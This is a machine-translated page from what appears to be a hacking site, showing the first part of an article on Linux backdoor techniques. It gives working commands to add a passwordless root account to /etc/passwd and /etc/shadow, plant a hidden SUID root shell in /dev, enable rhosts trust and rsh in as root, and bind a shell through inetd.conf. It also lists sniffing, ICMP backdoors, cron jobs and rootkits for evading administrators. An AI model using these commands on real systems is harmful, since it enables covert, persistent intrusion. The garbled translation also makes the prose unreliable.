Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker invade > Content
Hot Articles
The MS08-067 crack invad
Smoothwall previews low
The RPC crack invades
GE Interlogix Diamond II
when load_file() invasio
Breaks the IE safe limit
Uses 135 ports to invade
MS08-067 introduces the
The local area network i
Sharp oracle pours into
SonicWALL Customers Prot
SmoothWall Launches Smoo
Invades the WINDOWS serv
Invades RedHat the Linux
Lotus notes also plays t
Recommend Articles
Manual injection ASP scr
Simulates the intruder t
Invades the chinalinux s
The local area network i
Invades the Linux operat
Invades in the process t
Invades once more using
Invades the WINDOWS serv
PHP pours into the invas
Brief analysis Linux sys
Invades the Turkish webs
Invades RedHat the Linux
Buffer overflow analysis
Invades the Linux system
The study contains the c
New Articles
Comodo Disk Encryption n
CRYPTO-MAS-service authe
The criminal attacks Erh
Hackers and malware deve
Five steps to protect co
MI5 hack highlights secu
Kaspersky Mobile Securit
Clavister and Meru Netwo
BioSlimDisk encrypted po
Facebook users are at ri
Europ?organizations awar
Gumblar Web-based attack
2012 Olympic Games suffe
Ties aimed at both Windo
How to recover EFS encry
Brief analysis Linux system back door technology and practice method
  Add date: 07/12/2008   Publishing date: 07/12/2008   Hits: 43
Total 3 pages, Current page:1, Jump to page:
 

Back door synopsis 

  After intruder completely control system, will enter one kind of technology which next time for the convenience uses. 
  Generally realizes through the revision system configuration files and the installment third party back door tool. 
  Has the confidentiality, can go round the system log, is not easily characteristics and so on manager discovery. 

Commonly used back door technology 

  Increases the super user account 
  Explains/smells searches the user password 
  Lays aside SUID Shell 
  rhosts + + 
  Using system service routine 
  TCP/UDP/ICMP Shell 
  Crontab fixed time duty 
  Sharing storehouse document 
  Tool bag rootkit 
  May load essence module (LKM) 

Increases the super user 

  # echo “e4gle:x:0:0::/:/bin/sh” >> 
  /etc/passwd 
  # echo “e4gle::-1:-1:-1:-1:-1:-1:500” >> 
  /etc/shadow 
  If the system does not permit uid=0 user remote login, 
  Also needs to increase an average consumer account number. 

Explains/smells searches the user password 

  After obtaining the shadow document, with John the Ripper 
  The tool explains the weak user password. 
  Installs sniffit and so on to smell searches the tool, monitors telnet, ftp and so on 
  Port, collection user password. 

Lays aside SUID Shell 

  # cp /bin/bash /dev/.rootshell 
  # chmod u+s /dev/.rootshell 
  The average consumer moves /dev/.rootshell in this aircraft, namely 
  May obtain root jurisdiction shell. 

rhosts + + 

  # echo “+ +” > /.rhosts 
  # rsh - l root victim.com csh - i 
  Long-distance may obtain rootshell. 

Using system service routine 

  Revises /etc/inetd.conf, 
  daytime stream tcp nowait /bin/sh sh - I 
  Replaces.telnetd.rexecd with the trojan procedure and so on 
  inted service routine 
  Heavy directional login procedure 

TCP/UDP/ICMP Shell 

  BindShell, majority is based on the TCP/UDP agreement 
  The network service routine, in the high port monitor, is very easy 
  Was discovered. 
  Ping Backdoor, through ICMP package of activation back door, 
  Forms a Shell channel. 
  TCP the ACK data packet back door, can pass through the fire protection 
  Wall. 

Crontab fixed time duty 

  Through the Crontab program schedule already the back door procedure which installs 
  Fixed time the movement, generally in the night time interval, is the system administration 
  Not online time. 

Sharing storehouse document 

  Inserts the back door function in the sharing storehouse 

 

Other pages: : 1 * 2 * 3 * Next>>
Prev:PHP pours into the invasion example Next:Invades the Turkish website example

Comment:

Category: Home > hacker invade
Home